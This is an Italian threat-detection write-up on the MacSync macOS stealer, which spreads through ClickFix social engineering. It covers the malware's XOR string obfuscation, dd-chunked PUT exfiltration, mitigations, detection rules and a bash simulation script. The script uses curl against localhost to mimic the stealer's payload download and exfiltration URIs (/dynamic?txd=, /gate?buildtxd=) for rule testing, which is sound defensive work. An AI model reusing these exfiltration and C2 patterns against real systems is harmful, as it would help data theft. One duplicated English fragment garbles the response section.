MacSync macOS Stealer usa inganni ClickFix per evitare il rilevamento.
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
MacSync Stealer è un malware-as-a-service (MaaS) focalizzato su macOS che si basa sull’ingegneria sociale in stile ClickFix per ingannare gli utenti a eseguire comandi Terminal dannosi. Il malware segue una catena di esecuzione modulare e multi-fase che coinvolge binari Mach-O, esecuzione AppleScript in memoria e esfiltrazione di dati con suddivisione a blocchi. Per evitare il rilevamento, utilizza cifratura XOR, demonizzazione dei processi e rapida rimozione di artefatti forensi.
Indagine
L’indagine ha incluso l’ingegneria inversa di uno stager Mach-O a 64-bit per mappare il suo flusso di esecuzione e le tecniche di evasione. I ricercatori hanno identificato una classe template C++ che usa la cifratura XOR a singolo byte con la chiave 0xAA per nascondere le stringhe funzionali e gli endpoint C2. L’analisi ha anche rivelato un meccanismo avanzato di esfiltrazione che utilizza l’utilità dd per dividere i dati rubati in blocchi da 10 MB prima dei trasferimenti HTTP PUT.
Mitigazione
Gli utenti dovrebbero essere addestrati a evitare di copiare e incollare comandi Terminal suggeriti da errori del browser, pagine di verifica false o pop-up ClickFix. Le organizzazioni dovrebbero monitorare attentamente l’attività del Terminal e l’esecuzione non autorizzata di osascript. Limitare i binari non autorizzati e monitorare la creazione o l’esecuzione di file sospetti all’interno di /tmp può ridurre ulteriormente l’esposizione.
Risposta
Se viene rilevata un’attività di MacSync, l’endpoint macOS interessato dovrebbe essere isolato immediatamente per fermare ulteriori esfiltrazioni di dati. I rispondenti dovrebbero eseguire un’analisi forense della directory /tmp e ispezionare ~/Library/LaunchAgents/ per plist di persistenza malevoli. I log di sistema dovrebbero anche essere esaminati per esecuzioni non autorizzate e il traffico di rete controllato per connessioni a domini C2 noti. osascript execution and network traffic checked for connections to known C2 domains.
Flusso di attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Tentativo Sospetto di Esecuzione di Curl [MacOS] (tramite cmdline)
L’Archivio è Stato Creato Nella Cartella Temporanea di MacOS (tramite file_event)
IOC (HashSha256) da rilevare: MacSync: Il ladro macOS Evasivo che Sfrutta gli Escamotage ClickFix
IOC (HashSha1) da rilevare: MacSync: Il ladro macOS Evasivo che Sfrutta gli Escamotage ClickFix
IOC (HashMd5) da rilevare: MacSync: Il ladro macOS Evasivo che Sfrutta gli Escamotage ClickFix
MacSync Stealer – Rilevazione Basata su URI [Webserver]
MacSync: Demonizzazione di Sessioni Invisibili su macOS [Creazione di Processi su Linux]
Esecuzione della Simulazione
Prerequisito: Il Controllo Pronto alla Partenza di Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione & Comandi d’Attacco: L’attaccante mira a imitare il ciclo di comunicazione del ladro MacSync. Innanzitutto, l’attaccante simula un’esca “Clickfix” dove la macchina della vittima è istruita a scaricare un payload tramite uno specifico URI:
/dynamic?txd=. Una volta che il “malware” è in esecuzione, esegue l’esfiltrazione inviando blocchi di dati rubati al server C2 utilizzando una richiestaPUTall’URI/gate?buildtxd=. Questo simula il modello esatto che la regola di rilevamento sta cercando. -
Script di Test di Regressione: Questo script utilizza
curlper generare le richieste HTTP specifiche che corrispondono ai criteri di selezione dell’URI della regola Sigma.#!/bin/bash # Script di Simulazione URI del Ladro MacSync # Questo script simula le richieste GET e PUT utilizzate da MacSync TARGET_URL="http://localhost" echo "[+] Simulazione Download Payload (GET /dynamic?txd=)..." curl -X GET "$TARGET_URL/dynamic?txd=malicious_payload_123" -s -o /dev/null echo "[+] Simulazione Esfiltrazione Dati (PUT /gate?buildtxd=)..." # Simulazione di un upload suddiviso in blocchi da 10MB come menzionato nella descrizione della regola dd if=/dev/urandom of=chunk.bin bs=1M count=10 2>/dev/null curl -X PUT "$TARGET_URL/gate?buildtxd=exfil_data_456" --data-binary @chunk.bin -s -o /dev/null echo "[+] Simulazione Completa." -
Comandi di Pulizia:
# Rimuovi il blocco di dati fittizio creato durante la simulazione rm -f chunk.bin